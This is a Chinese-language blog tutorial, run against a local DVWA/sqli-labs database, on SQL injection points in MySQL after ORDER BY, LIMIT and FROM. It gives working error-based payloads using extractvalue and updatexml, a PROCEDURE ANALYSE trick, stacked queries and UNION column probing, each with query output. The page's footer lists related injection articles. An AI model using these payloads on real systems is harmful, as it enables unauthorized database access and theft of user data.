关于MySQL注入点的问题

已于 2023-06-29 21:23:14 修改
阅读量298 收藏
点赞数
分类专栏: 随笔 文章标签: order by注入
于 2021-01-24 14:58:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/113090489
版权

order by后注入

注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入

对于关键词order by来说,如果使用预编译处理,参数绑定为String类型,order by 的参数会被单引号包裹,导致无法排序,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误

desc或者asc(升序or降序排列)显示结果不同,则表明可以注入

mysql> select * from users order by 1 desc;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)

mysql> select * from users order by 1 asc;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)

select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);


mysql> select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':8.0.12'


mysql> select * from users order by 1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);

ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

sqli-labs第46关有order注入,感兴趣的可以自己试试


limit后注入

方法仅适用于5.0.0<mysql<5.6.6的版本

使用PROCEDURE ANALYSE 配合报错注入

select * from users limit 0,2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

堆叠注入也可以

mysql> select * from users limit 0,2;show databases;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

2 rows in set (0.00 sec)



+--------------------+

| Database           |

+--------------------+

| bwapp              |

| challenges         |

| dvwa               |

| information_schema |

| mysql              |

| performance_schema |

| pikachu            |

| pkxss              |

| root               |

| security           |

| sys                |

+--------------------+

14 rows in set (0.00 sec)

from 后面的注入

结合 order by 猜测列数,然后使用联合注入来注入

mysql> select * from users order by 8;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

5 rows in set (0.00 sec)



mysql> select * from users union select 1,2,3,4,user(),6,7,8;

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

| user_id | first_name | last_name | user    | password                         | avatar                      | last_login          | failed_login |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg   | 2019-10-06 14:59:01 |            8 |

|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 |            0 |

|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg    | 2019-09-12 11:23:53 |            0 |

|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg   | 2019-09-12 11:23:53 |            0 |

|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg  | 2019-09-12 11:23:53 |            0 |

|       1 | 2          | 3         | 4       | root@localhost                   | 6                           | 7                   |            8 |

+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+

6 rows in set (0.00 sec)
春日野穹ㅤ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL注入攻击与防御
02-25
下面几注入中经常会用到的语句控制语句操作(select,case,if(),...)比较操作(=,like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入进行测试以下是Mysql中可以用到的注释符:Examples:1.确定字段数(1)ORDERBYORDERBY用于判断表中的字段个数(2)SELECT...INTO关于SELECT...INTO的解释可以看这一篇文章SELECT...INTO解释当出现L
SQL注入漏洞学习小结
最新发布
dayouzi的博客
08-22 567
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
关于Java中order by注入详解
m0_60571990的博客
03-17 1238
关于Java中order by注入详解
mqsql的简单命令
maqingbin8888的专栏
04-19 1145
 --创建数据库  mysql> create database 数据库名称  --创建表  mysql> create table 表名 (  列的名字(id)类型(int(4))primary key(定义主键) auto_increment(描述 自增),  ……,  );  --查看所有数据库  mysql> show databases 数据库名称;  --使用某个数据库  mysql>
[ 漏洞挖掘基础篇三 ] 漏洞挖掘之fuzz测试
qq_51577576的博客
04-29 7436
🍬博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指,相互学习进步! 中华人民共和国网络安全法 第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动:不得提供专门用于从事侵入网络、干扰网络正常功能...
MySql注入科普
huike008的博客
06-01 154
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:表示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:表示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ‘ 假 ” 真 “ 假 “” 真...
SQL注入之union联合注入
hobby云说
06-12 3485
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
SQL注入MYSQL注入
av11566的博客
04-19 6917
前言 MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
史上最完整的MySQL注入
xiaoi123的博客
09-07 1万+
作者:Passerby2 原文来自:史上最完整的MySQL注入 免责声明:本教程仅用于教育目的,以保护您自己的SQL注释代码。 在阅读本教程后,您必须对任何行动承担全部责任。 0x00 ~ 背景 这篇文章题目为“为新手完成MySQL注入”,它旨在提供专门针对MySQL数据库的SQL注入的完整知识和工作方式,除了堆栈查询部分。 这里的第一个贡献...... 表中的内容 介绍 ...
SQL注入关键词大全
热门推荐
怪兽的博客
08-08 3万+
高级搜索关键词 sql 注入大全 拿起你手中的 啊D 明小子 pangolin  激情把 inurl:asp?id= inurl:Article_Print.asp? inurl:EnCompHonorBig.asp?id=随便加个数字 inurl:showproduct.asp?id=随便加个数字  inurl:ManageLogin.asp inurl:EnCompH
浅析MySQL注入安全问题
09-10
主要介绍了浅析MySQL注入安全问题,文中简单说道了如何避免SQL注入敞开问题的方法,需要的朋友可以参考下
第01篇:MySQL注入写WebShell的5种方式1
08-03
1、在默认数据库 test 中创建测试表admin和测试数据,新建test用户授予FILE权限 2、使用test用户连接 1、利用Union select 写入
mysql注入绕过技术
06-04
mysql注入绕过技术
SQL Injection with MySQL 注入分析
09-14
本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
Druid未授权访问利用
春日野穹
11-14 1万+
引言~ 最近外网打遇到个Druid未授权访问漏洞,觉得过程比较有趣,所以简单记录一下 Druid简介 druid是阿里研发的一款数据库连接池,其开发语言为java,druid集合了c3p0、dbcp、proxool等连接池的优,还加入了日志监控、session监控等数据监控功能,使用Druid能有效的监控DB池连接和SQL的执行情况。 更多信息可参考官方GitHub项目:https://github.com/alibaba/druid druid虽高效好用,但当开发者配置不当时就可能造成未授权访问,攻
Nginx配置Basic_Auth登录认证
春日野穹
08-29 1万+
前言~ 闲来无事查看日志,发现新搬家的web服务器频繁遭到僵尸网络的扫描,虽然web服务加固的还不错,但是框架组件出现了新的nday,而自己又没及时留意到漏洞的存在去修补,那么服务器成为肉鸡的风险就增大了;一般来说,僵尸网络的扫描行为都是全互联网大范围进行的,并且所探测的漏洞大多都是一些新爆发的cms漏洞(ThinkPHP)、或者是一些常见的框架组件漏洞(如Struts2),针对该特性,我们可以配置Basic Auth登录认证(ngx_http_auth_basic_module),来减少僵尸网络对我们we
关于命令行代理流量的问题
春日野穹
01-24 5833
Windows 注:以下代理仅作用于当前命令行! HTTP 代理设置: set http_proxy=http://127.0.0.1:10809 http访问设置 set https_proxy=http://127.0.0.1:10809 https访问设置,一般两个选项代理都开启,例如开启http_proxy,但是命令行访问https站还是原IP socks 代理设置: set http_proxy=socks5://127.0.0.1:10808 set https_proxy=so
解决docker-compose命令运行报错
春日野穹
02-17 4493
报错信息: ERROR: Couldn't connect to Docker daemon at http+docker://localhost - is it running? If it's at a non-standard location, specify the URL with the DOCKER_HOST environment variable. 解决方法: 1.命令行...
Wireshark的一些常用命令
春日野穹
01-24 4082
Wireshark的命令太多,做个笔记 TCP三次握手协议 第一次握手:客户端的应用程序主动打开,并向服务端发出请求报文段。其首部中SYN=1,seq=x。 第二次握手:服务器应用被动打开。若同意客户端的请求,则发回确认报文。其首部中:SYN=1,ACK=1,ack=x+1,seq=y。 第三次握手:客户端收到确认报文之后,通知上层应用进程已建立,并向服务器发出确认报文。其首部ACK=1,ack=y+1。 运算符 比较运算符 英文写法 C语言写法 含义 eq == 等于 ne != 不
mysql模糊查询Sql注入问题
08-04
MySQL中,模糊查询的SQL注入问题是一个需要注意的安全隐患。当我们在拼接模糊查询条件时,如果不对输入参数进行处理,就有可能导致SQL注入攻击。引用[1]中提到,在使用MyBatis进行模糊查询时,如果将模糊查询条件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值